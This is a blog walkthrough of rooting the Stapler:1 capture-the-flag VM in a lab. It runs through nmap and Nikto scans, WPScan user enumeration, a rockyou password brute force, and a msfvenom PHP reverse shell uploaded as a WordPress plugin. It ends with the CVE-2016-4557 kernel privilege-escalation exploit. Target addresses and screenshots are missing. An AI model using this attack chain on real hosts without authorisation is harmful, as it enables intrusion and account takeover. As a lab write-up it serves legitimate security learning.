Stapler:1 – CTF

This is a walkthrough of how I gained root access to the Stapler:1 image from  This walkthrough is being provided for educational purposes only.  All testing on this image was done in an isolated lab environment.  Understand that using the tools in this walkthrough against a host without permission is against the law.  Be smart folks, and enjoy the walkthrough.

Full NMAP Scan of host:

root@kali:~# nmap -p- -A


There are a lot of ports/services to enumerate here.  After some time, my enumeration of port 12380 uncovered some interesting things.

Enumerating port 12380 using Nikto:

root@kali:~# nikto -h


Nikto scan found the robots.txt file and 2 entries within.  Investigating these brings me to a WordPress page.


Using WPScan to to get version and plugin info:

root@kali:~# wpscan –url


WordPress version is 4.2.1.  I didn’t find anything useful in regards to plugins or versions.

Using WPScan to enumerate users:

root@kali:~# wpscan -u –enumerate u


Using WPScan to brute force login (starting with john):

root@kali:~# wpscan -u –wordlist /usr/share/wordlists/rockyou.txt –username john


I am able to login to WordPress using the credentials john/incorrect. Now to create a reverse shell payload.

Creating reverse shell payload using Msfvenom:

root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT=4444 -f raw > shell235.php


Uploading my .php reverse shell to the plugins page:

Browse to plugins –> add new –> upload plugins.  Find the php shellcode and upload.  In my case, the file is shell235.php.


After clicking install now the next page will ask for an FTP path and FTP credentials. You don’t have to do anything here, the file has been uploaded.

Verifying the .php file has been uploaded:


As you can see, my shell235.php is here.  Now lets get our Metasploit handler ready to catch this shell.

Metasploit handler options:


Execute the reverse shell by clicking on shell235.php:


Catching low privilege shell:


As you can see from the screenshot, we are connected via the low privilege user www-data.

OS Enumeration provides the kernel and Linux flavor/version:


Searching the local Exploit DB for privilege escalation vulnerabilities:

root@kali:~# searchsploit linux kernel 4.4 Ubuntu 16


Identified a local privilege escalation exploit.  EDB-ID 39772/CVE-2016-4557.  POC code can be found/downloaded here:

Transferred exploit code using WGET:



Compiled Exploit:



Running exploit code:

www-data@red:/tmp/ebpf_mapfd_doubleput_exploit$ ./doubleput


Exploit code worked!

Flag.txt file:

cat /root/flag.txt



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s